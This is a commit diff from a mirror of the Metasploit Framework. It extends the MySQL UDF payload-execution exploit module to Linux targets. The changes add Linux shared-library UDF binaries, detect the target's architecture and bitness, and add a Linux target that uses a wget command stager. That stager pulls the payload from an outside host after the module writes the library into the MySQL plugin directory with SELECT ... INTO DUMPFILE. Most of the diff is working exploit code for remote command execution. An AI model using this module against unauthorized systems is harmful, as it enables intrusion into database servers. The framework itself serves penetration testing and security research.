infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

mysql UDF now multi

MS-2855/keylogger-mettle-extension
h00die 2017-11-03 05:26:05 -04:00
parent 60a7a80ff0
commit 697031eb36
5 changed files with 32 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/mysql/lib_mysqludf_sys_32.so Normal file
View File

Binary file not shown.

BIN
data/exploits/mysql/lib_mysqludf_sys_64.so Normal file
View File

Binary file not shown.

1
documentation/modules/exploit/multi/local/mysql_udf_priv_esc.md Normal file
View File

@ -0,0 +1 @@
on ubuntu, edit /lib/systemd/system/mysql.service

28
lib/msf/core/exploit/mysql.rb
View File

@ -144,21 +144,32 @@ module Exploit::Remote::MYSQL
binname = Rex::Text.rand_text_alpha(8) binname = Rex::Text.rand_text_alpha(8)
binpath = tmpdir << binname binpath = tmpdir << binname
print_status "Uploading binary as #{binpath}..." print_status "Uploading binary as #{binpath}..."
print_status "SELECT #{blob} into DUMPFILE '#{binpath}'"
res = mysql_query("SELECT #{blob} into DUMPFILE '#{binpath}'") res = mysql_query("SELECT #{blob} into DUMPFILE '#{binpath}'")
return res return res
end end
def mysql_upload_sys_udf(arch=:win32,target_path=nil) def mysql_upload_sys_udf(arch=:win32,target_path=nil)
fname = (arch == :win32 ? "lib_mysqludf_sys_32.dll" : "lib_mysqludf_sys_64.dll") case arch
when :win32
fname = 'lib_mysqludf_sys_32.dll'
when :win64
fname = 'lib_mysqludf_sys_64.dll'
when :linux32
fname = 'lib_mysqludf_sys_32.so'
when :linux64
fname = 'lib_mysqludf_sys_64.so'
end
sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname ) sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname )
data = File.open(sys_dll, "rb") {|f| f.read f.stat.size} data = File.open(sys_dll, "rb") {|f| f.read f.stat.size}
blob = "0x" blob = "0x"
blob << data.unpack("C*").map {|x| "%02x" % [x]}.join blob << data.unpack("C*").map {|x| "%02x" % [x]}.join
dll_name = Rex::Text.rand_text_alpha(8) dll_name = Rex::Text.rand_text_alpha(8)
target_dll = target_path << dll_name << ".dll" [:win32, :win64].include?(arch) ? extension = '.dll' : extension = '.so'
target_dll = target_path << dll_name << extension
print_status "Uploading #{fname} library to #{target_dll}..." print_status "Uploading #{fname} library to #{target_dll}..."
mysql_query("SELECT #{blob} into DUMPFILE '#{target_dll}'") mysql_query("SELECT #{blob} into DUMPFILE '#{target_dll}'")
return dll_name << ".dll" return dll_name << extension
end end
def mysql_drop_and_create_sys_exec(soname) def mysql_drop_and_create_sys_exec(soname)
@ -181,6 +192,15 @@ module Exploit::Remote::MYSQL
:win64 :win64
when /Win32/i when /Win32/i
:win32 :win32
when /Linux/i
# we need a second query to determine bits
res = mysql_get_variable("@@version_compile_machine")
return :unknown unless res
if res =~ /x86_64/i
:linux64
else
:linux32
end
else else
res res
end end
@ -189,7 +209,7 @@ module Exploit::Remote::MYSQL
def mysql_add_sys_exec def mysql_add_sys_exec
arch = mysql_get_arch arch = mysql_get_arch
case arch case arch
when :win64,:win32 when :win64,:win32,:linux64,:linux32
target_path = mysql_get_plugin_dir target_path = mysql_get_plugin_dir
if target_path if target_path
print_status "Target arch (#{arch}) and target path both okay." print_status "Target arch (#{arch}) and target path both okay."

13
modules/exploits/windows/mysql/mysql_payload.rb → modules/exploits/multi/mysql/mysql_udf_payload.rb
View File

@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
super( super(
update_info( update_info(
info, info,
'Name' => 'Oracle MySQL for Microsoft Windows Payload Execution', 'Name' => 'Oracle MySQL UDF Payload Execution',
'Description' => %q{ 'Description' => %q{
This module creates and enables a custom UDF (user defined function) on the This module creates and enables a custom UDF (user defined function) on the
target host via the SELECT ... into DUMPFILE method of binary injection. On target host via the SELECT ... into DUMPFILE method of binary injection. On
@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Author' => 'Author' =>
[ [
'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
'todb' # this Metasploit module 'todb', # this Metasploit module
'h00die' # linux addition
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
@ -35,12 +36,12 @@ class MetasploitModule < Msf::Exploit::Remote
# Bernardo's work with cmd exec via udf # Bernardo's work with cmd exec via udf
[ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ] [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
], ],
'Platform' => 'win', 'Platform' => ['win', 'linux'],
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit) [ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
[ 'Linux', {'CmdStagerFlavor' => 'wget' } ]
], ],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post. 'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
)) ))
@ -83,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
if not m if not m
return return
elsif not [:win32,:win64].include?(@mysql_arch) elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch)
print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'") print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
return return
else else